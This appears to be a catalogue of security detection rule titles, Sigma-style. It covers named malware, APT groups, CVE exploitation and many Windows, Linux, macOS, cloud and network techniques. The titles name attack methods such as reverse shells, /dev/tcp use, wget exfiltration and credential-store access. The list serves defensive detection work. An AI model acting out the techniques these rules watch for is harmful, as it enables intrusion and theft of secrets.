  • Potential COLDSTEEL RAT Windows User Creation
  • COLDSTEEL Persistence Service Creation
  • DarkGate - Autoit3.EXE Execution Parameters
  • DarkGate - User Created Via Net.EXE
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
  • Potential Pikabot C2 Activity
  • Potential Pikabot Discovery Activity
  • Potential Pikabot Hollowing Activity
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE
  • Qakbot Regsvr32 Calc Pattern
  • Potential Qakbot Rundll32 Execution
  • Qakbot Uninstaller Execution
  • SNAKE Malware WerFault Persistence File Creation
  • Potential SNAKE Malware Installation CLI Arguments Indicator
  • Potential SNAKE Malware Installation Binary Indicator
  • Potential SNAKE Malware Persistence Service Execution
  • SNAKE Malware Covert Store Registry Key
  • Ursnif Redirection Of Discovery Commands
  • Potential Compromised 3CXDesktopApp Beaconing Activity - DNS
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
  • Potential Compromised 3CXDesktopApp Execution
  • Potential Suspicious Child Process Of 3CXDesktopApp
  • Potential Compromised 3CXDesktopApp Update Activity
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy
  • Potential Compromised 3CXDesktopApp ICO C2 File Download
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler
  • Diamond Sleet APT DNS Communication Indicators
  • Diamond Sleet APT File Creation Indicators
  • Diamond Sleet APT DLL Sideloading Indicators
  • Diamond Sleet APT Process Activity Indicators
  • Diamond Sleet APT Scheduled Task Creation - Registry
  • Potential Operation Triangulation C2 Beaconing Activity - DNS
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy
  • Potential APT FIN7 Related PowerShell Script Created
  • Potential APT FIN7 POWERHOLD Execution
  • Potential POWERTRASH Script Execution
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
  • Lace Tempest File Indicators
  • Lace Tempest PowerShell Evidence Eraser
  • Lace Tempest PowerShell Launcher
  • Lace Tempest Cobalt Strike Download
  • Lace Tempest Malware Loader Execution
  • Lazarus APT DLL Sideloading Activity
  • Mint Sandstorm - Log4J Wstomcat Process Execution
  • Potential APT Mustang Panda Activity Against Australian Gov
  • Onyx Sleet APT File Creation Indicators
  • PaperCut MF/NG Exploitation Related Indicators
  • PaperCut MF/NG Potential Exploitation
  • Peach Sandstorm APT Process Activity Indicators
  • UNC4841 - Email Exfiltration File Pattern
  • UNC4841 - Barracuda ESG Exploitation Indicators
  • UNC4841 - SSL Certificate Exfiltration Via Openssl
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare
  • CVE-2024-50623 Exploitation Attempt - Cleo
  • Potential CSharp Streamer RAT Loading .NET Executable Image
  • File Creation Related To RAT Clients
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence
  • Potential Kapeka Decrypted Backdoor Indicator
  • Kapeka Backdoor Loaded Via Rundll32.EXE
  • Kapeka Backdoor Persistence Activity
  • Kapeka Backdoor Execution Via RunDLL32.EXE
  • Kapeka Backdoor Autorun Persistence
  • Kapeka Backdoor Scheduled Task Creation
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe
  • Potential Raspberry Robin Aclui Dll SideLoading
  • Potential Raspberry Robin CPL Execution Activity
  • DPRK Threat Actor - C2 Communication DNS Indicators
  • Forest Blizzard APT - File Creation Activity
  • Forest Blizzard APT - Process Creation Activity
  • Forest Blizzard APT - Custom Protocol Handler Creation
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
  • ScreenConnect - SlashAndGrab Exploitation Indicators
  • Privilege Role Elevation Not Occurring on SAW or PAW
  • Privilege Role Sign-In Outside Expected Controls
  • Privilege Role Sign-In Outside Of Normal Hours
  • Potential Zerologon (CVE-2020-1472) Exploitation
  • New RDP Connection Initiated From Domain Controller
  • Dfsvc.EXE Initiated Network Connection Over Uncommon Port
  • Sign-in Failure Bad Password Threshold
  • CVE-2021-3156 Exploitation Attempt
  • CVE-2021-3156 Exploitation Attempt Bruteforcing
  • Potential CVE-2021-4034 Exploitation Attempt
  • OMIGOD SCX RunAsProvider ExecuteScript
  • Possible DNS Tunneling
  • High DNS subdomain requests rate per domain
  • Large domain name request
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation Via Use Rundll32
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • File Creation by Office Applications
  • Execution via CL_Invocation.ps1 (2 Lines)
  • Execution via CL_Mutexverifiers.ps1 (2 Lines)
  • Silence.Downloader V3
  • DNSCat2 Powershell Implementation Detection Via Process Creation
  • MSI Spawned Cmd and Powershell Spawned Processes
  • Always Install Elevated Parent Child Correlated
  • Stored Credentials in Fake Files
  • Windows Kernel and 3rd-Party Drivers Exploits Token Stealing
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Detection of Possible Rotten Potato
medium 1496
Rules (1496):
  • App Permissions Granted For Other APIs
  • Edit of .bash_profile and .bashrc
  • User Added To Admin Group - MacOS
  • Brute Force
  • Suspicious Remote Thread Target
  • Suspicious Unattend.xml File Access
  • SCM DLL Sideload
  • Suspicious Non-Browser Network Communication With Reddit API
  • PsExec Pipes Artifacts
  • Netcat The Powershell Version - PowerShell Module
  • Accessing Encrypted Credentials from Google Chrome Login Database
  • Suspicious PowerShell Download
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Potential NT API Stub Patching
  • Read and Execute a File Via Cmd.exe
  • Cmd Stream Redirection
  • Visual Basic Script Execution
  • Indirect Command Execution via Forfiles
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Monitoring Wuauclt.exe For Lolbas Execution Of DLL
  • Abusing Findstr for Defense Evasion
  • Nslookup PwSh Download Cradle
  • Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
  • Potential PowerShell Base64 Encoded Shellcode
  • Potential Xor Encoded PowerShell Command
  • Renamed PaExec Execution
  • Root Certificate Installed
  • Suspicious Rundll32 Script in CommandLine
  • Run from a Zip File
  • Suspicious Bitstransfer via PowerShell
  • Suspicious Cmd Execution via WMI
  • Wscript Execution from Non C Drive
  • Squirrel Lolbin
  • Winword.exe Loads Suspicious DLL
  • WMI Execution Via Office Process
  • WMI Remote Command Execution
  • WMI Reconnaissance List Remote Services
  • Sysinternals SDelete Registry Keys
  • Autorun Keys Modification
  • Service Binary in Uncommon Folder
  • Potential Persistence Via COM Search Order Hijacking
  • PowerShell Execution
  • Domain Trust Discovery
  • Security Event Log Cleared
  • Django Framework Exceptions
  • Kubernetes CronJob/Job Modification
  • Kubernetes Admission Controller Modification
  • Kubernetes Events Deleted
  • Potential Remote Command Execution In Pod Container
  • Creation Of Pod In System Namespace
  • Kubernetes Rolebinding Modification
  • Kubernetes Secrets Modified or Deleted
  • Potential Sidecar Injection Into Running Deployment
  • Python SQL Exceptions
  • Ruby on Rails Framework Exceptions
  • Spring Framework Exceptions
  • Suspicious SQL Query
  • AWS Attached Malicious Lambda Layer
  • AWS CloudTrail Important Change
  • New Network Route Added
  • Ingress/Egress Security Group Modification
  • LoadBalancer Security Group Modification
  • RDS Database Security Group Modification
  • AWS Console GetSigninToken Potential Abuse
  • SES Identity Has Been Deleted
  • AWS SAML Provider Deletion Activity
  • AWS S3 Bucket Versioning Disable
  • AWS Key Pair Import Activity
  • AWS EC2 Disable EBS Encryption
  • AWS ECS Task Definition That Queries The Credential Endpoint
  • AWS EFS Fileshare Modified or Deleted
  • AWS EFS Fileshare Mount Modified or Deleted
  • AWS IAM Backdoor Users Keys
  • New AWS Lambda Function URL Configuration Created
  • AWS RDS Master Password Change
  • AWS Root Credentials
  • AWS Snapshot Backup Exfiltration
  • AWS Suspicious SAML Activity
  • Azure Active Directory Hybrid Health AD FS New Server
  • Azure Active Directory Hybrid Health AD FS Service Delete
  • User Added to an Administrator's Azure AD Role
  • Azure Application Deleted
  • Azure Application Gateway Modified or Deleted
  • Azure Application Security Group Modified or Deleted
  • Azure Application Credential Modified
  • Number Of Resource Creation Or Deployment Activities
  • Azure Device No Longer Managed or Compliant
  • Azure Device or Configuration Modified or Deleted
  • Azure DNS Zone Modified or Deleted
  • Azure Firewall Modified or Deleted
  • Azure Firewall Rule Collection Modified or Deleted
  • Granting Of Permissions To An Account
  • Azure Keyvault Key Modified or Deleted
  • Azure Key Vault Modified or Deleted
  • Azure Keyvault Secrets Modified or Deleted
  • Azure Kubernetes Admission Controller
  • Azure Kubernetes CronJob
  • Azure Kubernetes Events Deleted
  • Azure Kubernetes Network Policy Change
  • Azure Kubernetes Pods Deleted
  • Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted
  • Azure Kubernetes Sensitive Role Access
  • Azure Kubernetes Secret or Config Object Access
  • Azure Kubernetes Service Account Modified or Deleted
  • Disabled MFA to Bypass Authentication Mechanisms
  • Azure Network Firewall Policy Modified or Deleted
  • Azure Point-to-site VPN Modified or Deleted
  • Azure Firewall Rule Configuration Modified or Deleted
  • Azure Network Security Configuration Modified or Deleted
  • Azure Virtual Network Device Modified or Deleted
  • Azure New CloudShell Created
  • Azure Owner Removed From Application or Service Principal
  • Rare Subscription-level Operations In Azure
  • Azure Service Principal Created
  • Azure Service Principal Removed
  • Azure Suppression Rule Created
  • Azure Virtual Network Modified or Deleted
  • Azure VPN Connection Modified or Deleted
  • CA Policy Removed by Non Approved Actor
  • CA Policy Updated by Non Approved Actor
  • New CA Policy by Non-approved Actor
  • Bitlocker Key Retrieval
  • Certificate-Based Authentication Enabled
  • Guest Users Invited To Tenant By Non Approved Inviters
  • New Root Certificate Authority Added
  • End User Consent Blocked
  • Added Owner To Application
  • App Assigned To Azure RBAC/Microsoft Entra Role
  • Change to Authentication Method
  • Azure Domain Federation Settings Modified
  • User Added To Group With CA Policy Modification Access
  • User Removed From Group With CA Policy Modification Access
  • Guest User Invited By Non Approved Inviters
  • User State Changed From Guest To Member
  • Privileged Account Creation
  • Multi Factor Authentication Disabled For User Account
  • Password Reset By User Account
  • Account Lockout
  • Successful Authentications From Countries You Do Not Operate Out Of
  • Increased Failed Authentications Of Any Type
  • Authentications To Important Apps Using Single Factor Authentication
  • Device Registration or Join Without MFA
  • Application Using Device Code Authentication Flow
  • Applications That Are Using ROPC Authentication Flow
  • Account Disabled or Blocked for Sign in Attempts
  • Login to Disabled Account
  • Multifactor Authentication Denied
  • Azure Unusual Authentication Interruption
  • Multifactor Authentication Interrupted
  • Users Authenticating To Other Azure AD Tenants
  • User Access Blocked by Azure Conditional Access
  • Bitbucket Global Permission Changed
  • Bitbucket Global Secret Scanning Rule Deleted
  • Bitbucket Global SSH Settings Changed
  • Bitbucket Audit Log Configuration Updated
  • Bitbucket User Details Export Attempt Detected
  • Bitbucket User Login Failure
  • Bitbucket User Login Failure Via SSH
  • Bitbucket User Permissions Export Attempt
  • Cisco Duo Successful MFA Authentication Via Bypass Code
  • GCP Access Policy Deleted
  • GCP Break-glass Container Workload Deployed
  • Google Cloud Storage Buckets Modified or Deleted
  • Google Cloud Re-identifies Sensitive Information
  • Google Cloud DNS Zone Modified or Deleted
  • Google Cloud Firewall Modified or Deleted
  • Google Full Network Traffic Packet Capture
  • Google Cloud Kubernetes Admission Controller
  • Google Cloud Kubernetes CronJob
  • Google Cloud Kubernetes RoleBinding
  • Google Cloud Kubernetes Secrets Modified or Deleted
  • Google Cloud Service Account Disabled or Deleted
  • Google Cloud Service Account Modified
  • Google Cloud SQL Database Modified or Deleted
  • Google Cloud VPN Tunnel Modified or Deleted
  • Google Workspace Application Access Level Modified
  • Google Workspace Application Removed
  • Google Workspace Granted Domain API Access
  • Google Workspace MFA Disabled
  • Google Workspace Role Modified or Deleted
  • Google Workspace Role Privilege Deleted
  • Google Workspace User Granted Admin Privileges
  • Github Delete Action Invoked
  • Github Fork Private Repositories Setting Enabled/Cleared
  • Github Outside Collaborator Detected
  • Github Repository/Organization Transferred
  • Github SSH Certificate Configuration Changed
  • New Federated Domain Added
  • New Federated Domain Added - Exchange
  • Activity from Suspicious IP Addresses
  • Activity Performed by Terminated User
  • Activity from Anonymous IP Addresses
  • Data Exfiltration to Unsanctioned Apps
  • Activity from Infrequent Country
  • Microsoft 365 - Impossible Travel Activity
  • Logon from a Risky IP Address
  • Microsoft 365 - Potential Ransomware Activity
  • PST Export Alert Using eDiscovery Alert
  • PST Export Alert Using New-ComplianceSearchAction
  • Suspicious OAuth App File Download Activities
  • Microsoft 365 - Unusual Volume of File Deletion
  • Microsoft 365 - User Restricted from Sending Email
  • Okta Admin Functions Access Through Proxy
  • Okta Admin Role Assigned to a User or Group
  • Okta Admin Role Assignment Created
  • Okta API Token Created
  • Okta API Token Revoked
  • Okta Application Modified or Deleted
  • Okta Application Sign-On Policy Modified or Deleted
  • Okta Identity Provider Created
  • Okta Network Zone Deactivated or Deleted
  • Okta MFA Reset or Deactivated
  • Okta Policy Rule Modified or Deleted
  • Okta Security Threat Detected
  • Okta Unauthorized Access to App
  • Okta User Account Locked Out
  • Default Credentials Usage
  • Bpfdoor TCP Ports Redirect
  • File Time Attribute Change - Linux
  • Remove Immutable File Attribute - Auditd
  • Creation Of An User Account
  • Data Exfiltration with Wget
  • Masquerading as Linux Crond Process
  • Modify System Firewall
  • Suspicious C2 Activities
  • Suspicious Commands Linux
  • Program Executions in Suspicious Folders
  • Suspicious History File Operations - Linux
  • Systemd Service Creation
  • Unix Shell Configuration Modification
  • Suspicious Log Entries
  • Suspicious Use of /dev/tcp
  • Modifying Crontab
  • SSHD Error Message CVE-2018-15473
  • Suspicious OpenSSH Daemon Error
  • Disabling Security Tools - Builtin
  • Persistence Via Sudoers Files
  • Suspicious VSFTPD Error Messages
  • Persistence Via Cron Files
  • Wget Creating Files in Tmp Directory
  • Linux Doas Conf File Creation
  • Shell Invocation via Apt - Linux
  • Linux Base64 Encoded Pipe to Shell
  • BPFtrace Unsafe Option Usage
  • Enable BPF Kprobes Tracing
  • Remove Immutable File Attribute
  • Linux Base64 Encoded Shebang In CLI
  • Clear Linux Logs
  • Cat Sudoers
  • Remove Scheduled Cron Task/Job
  • Potential Linux Process Code Injection Via DD Utility
  • Ufw Force Stop Using Ufw-Init
  • ESXi Network Configuration Discovery Via ESXCLI
  • ESXi Storage Information Discovery Via ESXCLI
  • ESXi Syslog Configuration Change Via ESXCLI
  • ESXi System Information Discovery Via ESXCLI
  • ESXi Account Creation Via ESXCLI
  • ESXi VM List Discovery Via ESXCLI
  • ESXi VM Kill Via ESXCLI
  • ESXi VSAN Information Discovery Via ESXCLI
  • Group Has Been Deleted Via Groupdel
  • Suspicious Package Installed - Linux
  • Flush Iptables Ufw Chain
  • Potentially Suspicious Named Pipe Created Via Mkfifo
  • Mount Execution With Hidepid Parameter
  • Nohup Execution
  • Pnscan Binary Data Transmission Activity
  • Python Spawning Pretty TTY Via PTY Module
  • Potential Ruby Reverse Shell
  • Scheduled Cron Task/Job - Linux
  • Disabling Security Tools
  • Disable Or Stop Services
  • Potential Linux Amazon SSM Agent Hijacking
  • Chmod Suspicious Directory
  • Suspicious Curl File Upload - Linux
  • Suspicious Curl Change User Agents - Linux
  • Potential Discovery Activity Using Find - Linux
  • Suspicious Git Clone - Linux
  • Print History File Contents
  • Interactive Bash Suspicious Children
  • Linux Shell Pipe to Shell
  • Potential Suspicious Change To Sensitive/Critical Files
  • Execution Of Script Located In Potentially Suspicious Directory
  • Touch Suspicious Service File
  • User Has Been Deleted Via Userdel
  • User Added To Root/Sudoers Group Using Usermod
  • Download File To Potentially Suspicious Directory Via Wget
  • Potential Xterm Reverse Shell
  • MacOS Emond Launch Daemon
  • MacOS Scripting Interpreter AppleScript
  • File Time Attribute Change
  • Hidden Flag Set On File/Directory Via Chflags - MacOS
  • Indicator Removal on Host - Clear Mac System Logs
  • Hidden User Creation
  • Credentials from Password Stores - Keychain
  • System Integrity Protection (SIP) Disabled
  • Disable Security Tools
  • User Added To Admin Group Via Dscl
  • User Added To Admin Group Via DseditGroup
  • Root Account Enable Via Dsenableroot
  • Disk Image Creation Via Hdiutil - MacOS
  • Disk Image Mounting Via Hdiutil - MacOS
  • Suspicious Installer Package Child Process
  • System Information Discovery Using Ioreg
  • JAMF MDM Potential Suspicious Child Process
  • Launch Agent/Daemon Execution Via Launchctl
  • File Download Via Nscurl - MacOS
  • Payload Decoded and Decrypted via Built-in Utilities
  • Scheduled Cron Task/Job - MacOs
  • Security Software Discovery - MacOs
  • Osacompile Execution By Potentially Suspicious Applet/Osascript
  • Suspicious Browser Child Process - MacOS
  • Suspicious Execution via macOS Script Editor
  • Potential Discovery Activity Using Find - MacOS
  • Suspicious History File Operations
  • Potential In-Memory Download And Compile Of Payloads
  • Suspicious MacOS Firmware Activity
  • System Information Discovery Using sw_vers
  • User Added To Admin Group Via Sysadminctl
  • System Information Discovery Via Sysctl - MacOS
  • System Information Discovery Using System_Profiler
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS
  • Time Machine Backup Disabled Via Tmutil - MacOS
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS
  • Potential XCSSET Malware Infection
  • Cisco Denial of Service
  • Cisco File Deletion
  • Cisco Show Commands Input
  • Cisco Modify Configuration
  • Cisco Sniffing
  • Suspicious DNS Query with B64 Encoded String
  • Telegram Bot API Request
  • MITRE BZAR Indicators for Execution
  • MITRE BZAR Indicators for Persistence
  • Potential PetitPotam Attack Via EFS RPC Calls
  • Possible PrintNightmare Print Driver Install
  • SMB Spoolss Name Piped Usage
  • Suspicious DNS Z Flag Bit Set
  • DNS TOR Proxies
  • Executable from Webdav
  • Remote Task Creation via ATSVC Named Pipe - Zeek
  • Suspicious Access to Sensitive File Extensions - Zeek
  • Transferring Files with Credential Data via Network Shares - Zeek
  • Kerberos Network Traffic RC4 Ticket Encryption
  • Apache Threading Error
  • Download from Suspicious Dyndns Hosts
  • F5 BIG-IP iControl Rest API Command Execution - Proxy
  • PUA - Advanced IP/Port Scanner Update Check
  • Telegram API Access
  • Suspicious Base64 Encoded User-Agent
  • HTTP Request With Empty User Agent
  • Windows PowerShell User Agent
  • Rclone Activity via Proxy
  • Potential Base64 Encoded User-Agent
  • F5 BIG-IP iControl Rest API Command Execution - Webserver
  • Successful IIS Shortname Fuzzing Scan
  • Path Traversal Exploitation Attempts
  • Source Code Enumeration Detection by Keyword
  • Suspicious User-Agents Related To Recon Tools
  • Ntdsutil Abuse
  • Dump Ntds.dit To Suspicious Location
  • Backup Catalog Deleted
  • MSI Installation From Suspicious Locations
  • MSI Installation From Web
  • MSSQL Server Failed Logon From External Network
  • File Was Not Allowed To Run
  • Deployment AppX Package Was Blocked By AppLocker
  • Potential Malicious AppX Package Installation Attempts
  • Deployment Of The AppX Package Was Blocked By The Policy
  • Suspicious AppX Package Installation Attempt
  • Uncommon AppX Package Locations
  • Suspicious Digital Signature Of AppX Package
  • BITS Transfer Job Downloading File Potential Suspicious Extension
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD
  • Certificate Private Key Acquired
  • Certificate Exported From Local Certificate Store
  • DNS Query To MEGA Hosting Website - DNS Client
  • DNS Query To Put.io - DNS Client
  • Failed DNS Zone Transfer
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE
  • A Rule Has Been Deleted From The Windows Firewall Exception List
  • ETW Logging/Processing Option Disabled On IIS Server
  • New Module Module Added To IIS Server
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP
  • Standard User In High Privileged Group
  • MSExchange Transport Agent Installation - Builtin
  • NTLM Brute Force
  • Potential Remote Desktop Connection to Non-Domain Host
  • OpenSSH Server Listening On Socket
  • Azure AD Health Monitoring Agent Registry Keys Access
  • Azure AD Health Service Agents Registry Keys Access
  • Potential AD User Enumeration From Non-Machine Account
  • Remote Task Creation via ATSVC Named Pipe
  • Processes Accessing the Microphone and Webcam
  • DCERPC SMB Spoolss Named Pipe
  • Device Installation Blocked
  • DPAPI Domain Master Key Backup Attempt
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security
  • ISO Image Mounted
  • Kerberoasting Activity - Initial Query
  • LSASS Access From Non System Account
  • Windows Network Access Suspicious desktop.ini Action
  • New or Renamed User Account with '$' Character
  • Denied Access To Remote Desktop
  • Password Policy Enumerated
  • Windows Pcap Drivers
  • Possible DC Shadow Attack
  • SCM Database Handle Failure
  • SCM Database Privileged Operation
  • Potential Secure Deletion with SDelete
  • Remote Access Tool Services Have Been Installed - Security
  • A New Trust Was Created To A Domain
  • Addition of SID History to Active Directory Object
  • Account Tampering - Suspicious Failed Logon Reasons
  • Group Policy Abuse for Privilege Addition
  • Startup/Logon Script Added to Group Policy Object
  • Suspicious Remote Logon with Explicit Credentials
  • Potentially Suspicious AccessMask Requested From LSASS
  • Password Protected ZIP File Opened
  • Uncommon Outbound Kerberos Connection - Security
  • Suspicious Access to Sensitive File Extensions
  • Suspicious Kerberos RC4 Ticket Encryption
  • Remote Service Activity via SVCCTL Named Pipe
  • Transferring Files with Credential Data via Network Shares
  • User Added to Local Administrator Group
  • Potential Privileged System Service Operation - SeLoadDriverPrivilege
  • Windows Defender Exclusion List Modified
  • Windows Defender Exclusion Deleted
  • WMI Persistence - Security
  • Windows Defender Exclusion Registry Key - Write Access Requested
  • Potential Access Token Abuse
  • External Remote RDP Logon from Public IP
  • Pass the Hash Activity 2
  • Failed Logon From Public IP
  • Suspicious Application Installed
  • Suspicious Rejected SMB Guest Logon From IP
  • NTLMv1 Logon Between Client and Server
  • Potential CVE-2021-42287 Exploitation Attempt
  • Eventlog Cleared
  • Certificate Use With No Strong Mapping
  • Windows Defender Threat Detection Service Disabled
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System
  • Invoke-Obfuscation RUNDLL LAUNCHER - System
  • Anydesk Remote Access Software Service Installation
  • CSExec Service Installation
  • Mesh Agent Service Installation
  • NetSupport Manager Service Install
  • PAExec Service Installation
  • New PDQDeploy Service - Server Side
  • New PDQDeploy Service - Client Side
  • RemCom Service Installation
  • Remote Access Tool Services Have Been Installed - System
  • Remote Utilities Host Service Install
  • PsExec Service Installation
  • Tap Driver Installation
  • TacticalRMM Service Installation
  • Uncommon Service Installation Image Path
  • Service Installation in Suspicious Folder
  • Potential RDP Exploit CVE-2019-0708
  • Scheduled Task Executed From A Suspicious Location
  • Scheduled Task Executed Uncommon LOLBIN
  • Windows Defender Exclusions Added
  • Windows Defender Real-Time Protection Failure/Restart
  • WMI Persistence
  • Remote Thread Creation Via PowerShell In Uncommon Target
  • Remote Thread Created In Shell Application
  • Remote Thread Creation By Uncommon Source Image
  • Remote Thread Creation In Uncommon Target Image
  • Creation Of a Suspicious ADS File Outside a Browser Download
  • Hidden Executable In NTFS Alternate Data Stream
  • Unusual File Download From File Sharing Websites - File Stream
  • AppX Package Installation Attempts Via AppInstaller.EXE
  • Cloudflared Tunnels Related DNS Requests
  • DNS Query To Devtunnels Domain
  • DNS Query To AzureWebsites.NET By Non-Browser Process
  • DNS Query To MEGA Hosting Website
  • DNS Query Request By Regsvr32.EXE
  • DNS Query To Remote Access Software Domain From Non-Browser App
  • Suspicious DNS Query for IP Lookup Service APIs
  • TeamViewer Domain Query By Non-TeamViewer Application
  • DNS Query To Visual Studio Code Tunnels Domain
  • PUA - System Informer Driver Load
  • Malicious Driver Load By Name
  • Credential Manager Access By Uncommon Applications
  • Access To Crypto Currency Wallets By Uncommon Applications
  • Access To Windows Credential History File By Uncommon Applications
  • Access To Windows DPAPI Master Keys By Uncommon Applications
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications
  • Microsoft Teams Sensitive File Access By Uncommon Applications
  • Backup Files Deleted
  • EventLog EVTX File Deleted
  • Process Deletion of Its Own Executable
  • IIS WebServer Access Logs Deleted
  • PowerShell Console History Logs Deleted
  • Tomcat WebServer Logs Deleted
  • File Deleted Via Sysinternals SDelete
  • ADS Zone.Identifier Deleted By Uncommon Application
  • ADSI-Cache File Creation By Uncommon Tool
  • Advanced IP Scanner - File Event
  • Anydesk Temporary Artefact
  • Assembly DLL Creation Via AspNetCompiler
  • EVTX Created In Uncommon Location
  • Creation Of Non-Existent System DLL
  • New Custom Shim Database Created
  • Suspicious Screensaver Binary File Creation
  • Files With System DLL Name In Unsuspected Locations
  • Files With System Process Name In Unsuspected Locations
  • CSExec Service File Creation
  • Potentially Suspicious DMP/HDMP File Creation
  • Potential Persistence Attempt Via ErrorHandler.Cmd
  • Suspicious File Drop by Exchange
  • GoToAssist Temporary Installation Artefact
  • Potential Initial Access via DLL Search Order Hijacking
  • Installation of TeamViewer Desktop
  • ISO or Image Mount Indicator in Recent Files
  • GatherNetworkInfo.VBS Reconnaissance Script Output
  • SCR File Write Event
  • Potential Persistence Via Notepad++ Plugins
  • Office Macro File Download
  • OneNote Attachment File Dropped In Suspicious Location
  • New Outlook Macro Created
  • Publisher Attachment File Dropped In Suspicious Location
  • Suspicious File Created In PerfLogs
  • Potential Binary Or Script Dropper Via PowerShell
  • PowerShell Module File Created By Non-PowerShell Process
  • Potential Suspicious PowerShell Module File Created
  • PSScriptPolicyTest Creation By Uncommon Process
  • Rclone Config File Creation
  • RemCom Service File Creation
  • ScreenConnect Temporary Installation Artefact
  • Self Extraction Directive File Created In Potentially Suspicious Location
  • Startup Folder File Write
  • Created Files by Microsoft Sync Center
  • Suspicious Files in Default GPO Folder
  • Suspicious desktop.ini Action
  • Creation of a Diagcab
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
  • Potential Homoglyph Attack Using Lookalike Characters in Filename
  • Suspicious LNK Double Extension File Created
  • Suspicious PFX File Creation
  • PowerShell Profile Modification
  • Suspicious PROCEXP152.sys File Created In TMP
  • Drop Binaries Into Spool Drivers Color Folder
  • TeamViewer Remote Session
  • VsCode Powershell Profile Modification
  • Windows Terminal Profile Settings Modification By Uncommon Process
  • WinSxS Executable File Creation By Non-System Process
  • LiveKD Driver Creation
  • Process Monitor Driver Creation By Non-Sysinternals Binary
  • Creation of WerFault.exe/Wer.dll in Unusual Folder
  • VHD Image Download Via Browser
  • Visual Studio Code Tunnel Remote File Creation
  • Potential Webshell Creation On Static Website
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
  • Writing Local Admin Share
  • Potentially Suspicious Self Extraction Directive File Created
  • Suspicious Appended Extension
  • Amsi.DLL Loaded Via LOLBIN Process
  • CredUI.DLL Loaded By Uncommon Process
  • PowerShell Core DLL Loaded By Non PowerShell Process
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
  • Unsigned Image Loaded Into LSASS Process
  • CLR DLL Loaded Via Office Applications
  • DotNET Assembly DLL Loaded Via Office Application
  • Active Directory Parsing DLL Loaded Via Office Application
  • Microsoft Excel Add-In Loaded From Uncommon Location
  • Active Directory Kerberos DLL Loaded Via Office Application
  • Microsoft VBA For Outlook Addin Loaded Via Outlook
  • PowerShell Core DLL Loaded Via Office Application
  • Remote DLL Load Via Rundll32.EXE
  • WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
  • Potential Antivirus Software DLL Sideloading
  • Potential AVKkid.DLL Sideloading
  • Potential CCleanerDU.DLL Sideloading
  • Potential CCleanerReactivator.DLL Sideloading
  • Potential Chrome Frame Helper DLL Sideloading
  • Potential DLL Sideloading Via ClassicExplorer32.dll
  • Potential DLL Sideloading Using Coregen.exe
  • Potential DLL Sideloading Of DBGCORE.DLL
  • System Control Panel Item Loaded From Uncommon Location
  • Potential DLL Sideloading Of DBGHELP.DLL
  • Potential DLL Sideloading Of DbgModel.DLL
  • Potential Goopdate.DLL Sideloading
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
  • Potential DLL Sideloading Via JsSchHlp
  • Potential Libvlc.DLL Sideloading
  • Potential Mfdetours.DLL Sideloading
  • Potential DLL Sideloading Of MpSvc.DLL
  • Potential DLL Sideloading Of MsCorSvc.DLL
  • Potential Python DLL SideLoading
  • Potential RjvPlatform.DLL Sideloading From Default Location
  • Potential RoboForm.DLL Sideloading
  • Potential ShellDispatch.DLL Sideloading
  • Potential SolidPDFCreator.DLL Sideloading
  • Third Party Software DLL Sideloading
  • Potential Vivaldi_elf.DLL Sideloading
  • VMGuestLib DLL Sideload
  • VMMap Signed Dbghelp.DLL Potential Sideloading
  • Potential Wazuh Security Platform DLL Sideloading
  • Potential WWlib.DLL Sideloading
  • Unsigned Module Loaded by ClickOnce Application
  • DLL Load By System Process From Suspicious Locations
  • Python Image Load By Non-Python Process
  • Unsigned DLL Loaded by Windows Utility
  • WMIC Loading Scripting Libraries
  • Suspicious WSMAN Provider Image Loads
  • Uncommon Connection to Active Directory Web Services
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
  • Network Connection Initiated To BTunnels Domains
